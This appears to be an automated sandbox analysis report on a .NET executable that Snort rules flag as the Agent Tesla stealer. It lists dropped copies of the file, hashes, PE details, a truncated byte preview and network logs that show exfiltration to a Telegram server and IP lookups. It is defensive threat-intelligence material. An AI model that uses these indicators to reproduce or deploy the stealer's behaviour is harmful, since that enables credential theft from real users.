                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkiks3cu.tp3.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3bxpezw.gna.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tilezn50.bbb.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vy0mxscm.2f4.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1

                                                                                                                              C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1825280
                                                                                                                              Entropy (8bit):5.291589770491668
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                                                                                                              MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
                                                                                                                              SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
                                                                                                                              SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                              • Antivirus: Virustotal, Detection: 44%, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...

                                                                                                                              C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1825280
                                                                                                                              Entropy (8bit):5.291589770491668
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                                                                                                              MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
                                                                                                                              SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
                                                                                                                              SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...

                                                                                                                              C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):5.291589770491668
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              File name:file.exe
                                                                                                                              File size:1825280
                                                                                                                              MD5:2ddec3a033a6ded2ec135bb2f3ec897d
                                                                                                                              SHA1:cb40f86b808c7b7812fff7820dc596d3a78e5760
                                                                                                                              SHA256:bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
                                                                                                                              SHA512:12fe7e8088d62a32f53ba9db9e425d41f8c95dea742af3e7beecc8cae50e97e9573ebfa839ec339d57804b32c2a864110f9135bcde8123c2b5d10a1e3b4c7c38
                                                                                                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                                                                                                              TLSH:5D855BF20283FEC5A76F1D4484143940AC1418676BBC9768FDC92A97A3E9524EF9DEF0
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x5beeda
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x6418981C [Mon Mar 20 17:30:04 2023 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1bee900x4a.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c00000x530.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c20000xc.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x20000x1bcee00x1bd000False0.4746565572331461data5.286588181165908IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x1c00000x5300x600False0.3938802083333333data3.806174196677056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x1c20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                              RT_VERSION0x1c005c0x2e4data
                                                                                                                              RT_MANIFEST0x1c037c0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                              192.168.2.4149.154.167.220497024432851779 03/20/23-19:39:50.282462TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49702443192.168.2.4149.154.167.220
                                                                                                                              192.168.2.4149.154.167.220496984432851779 03/20/23-19:38:26.620974TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698443192.168.2.4149.154.167.220

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Mar 20, 2023 19:38:19.603668928 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:19.603749990 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:19.603835106 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:19.630438089 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:19.630492926 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.328294039 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.328383923 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:20.340078115 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:20.340123892 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.340564966 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.380551100 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:20.649841070 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:20.649912119 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.818044901 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.818145990 CET44349697104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:20.818200111 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:20.819470882 CET49697443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:38:26.500169039 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.500233889 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.500312090 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.501146078 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.501173973 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.574767113 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.574979067 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.578350067 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.578412056 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.578983068 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.581166029 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.581233978 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.618748903 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.620809078 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:26.620852947 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:27.011068106 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:27.011209965 CET44349698149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:27.011363983 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:38:27.027559042 CET49698443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:25.531714916 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:25.531794071 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:25.531898022 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:25.550930023 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:25.550990105 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.260768890 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.260880947 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:26.265906096 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:26.265940905 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.266740084 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.386190891 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:26.640167952 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:26.640227079 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.808101892 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.808207035 CET44349700104.237.62.211192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:26.808506012 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:26.810086012 CET49700443192.168.2.4104.237.62.211
                                                                                                                              Mar 20, 2023 19:39:50.165476084 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.165545940 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.165632010 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.166136980 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.166155100 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.230001926 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.230119944 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.232402086 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.232420921 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.232748985 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.234488010 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.234508991 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.282051086 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.282367945 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.282392025 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.449218988 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.449340105 CET44349702149.154.167.220192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.449481964 CET49702443192.168.2.4149.154.167.220
                                                                                                                              Mar 20, 2023 19:39:50.759490013 CET49702443192.168.2.4149.154.167.220

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Mar 20, 2023 19:38:19.534012079 CET5091153192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:38:19.553659916 CET53509118.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:19.561065912 CET5968353192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:38:19.580924988 CET53596838.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:38:26.481441975 CET6416753192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:38:26.498725891 CET53641678.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:25.449285030 CET5223953192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:39:25.469089985 CET53522398.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:25.475931883 CET5680753192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:39:25.498383999 CET53568078.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:47.851300955 CET6100753192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:39:47.876548052 CET53610078.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:47.912009001 CET6068653192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:39:47.930107117 CET53606868.8.8.8192.168.2.4
                                                                                                                              Mar 20, 2023 19:39:50.132524967 CET6112453192.168.2.48.8.8.8
                                                                                                                              Mar 20, 2023 19:39:50.152019978 CET53611248.8.8.8192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Mar 20, 2023 19:38:19.534012079 CET192.168.2.48.8.8.80x8136Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.561065912 CET192.168.2.48.8.8.80xdac7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
